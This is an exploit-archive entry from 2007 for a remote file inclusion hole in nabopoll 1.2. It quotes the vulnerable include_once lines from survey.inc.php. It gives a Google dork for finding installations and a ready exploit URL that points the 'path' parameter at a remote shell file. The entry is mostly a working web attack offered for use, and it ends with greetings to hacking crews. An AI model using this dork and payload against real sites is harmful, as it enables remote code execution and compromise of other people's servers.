[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability
# Published : 2007-02-15
# Author : Cr@zy_King
# Previous Title : ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities
# Next Title : CodeAvalanche News 1.x (CAT_ID) Remote SQL Injection Vulnerability
By Cr@zy_King
crazy_king@eno7.org
Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim
Script : nabopoll 1.x
Risk : Remote File .nclude | High
Site : http://nabocorp.com/
Google Dork : inurl:"nabopoll/"
Exploit :
include_once($path."includes/tags.inc.php");
include_once($path."config.inc.php");
Files: survey.inc.php
Exploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?
Ayyildiz.Org Present
# www.Syue.com [2007-02-15]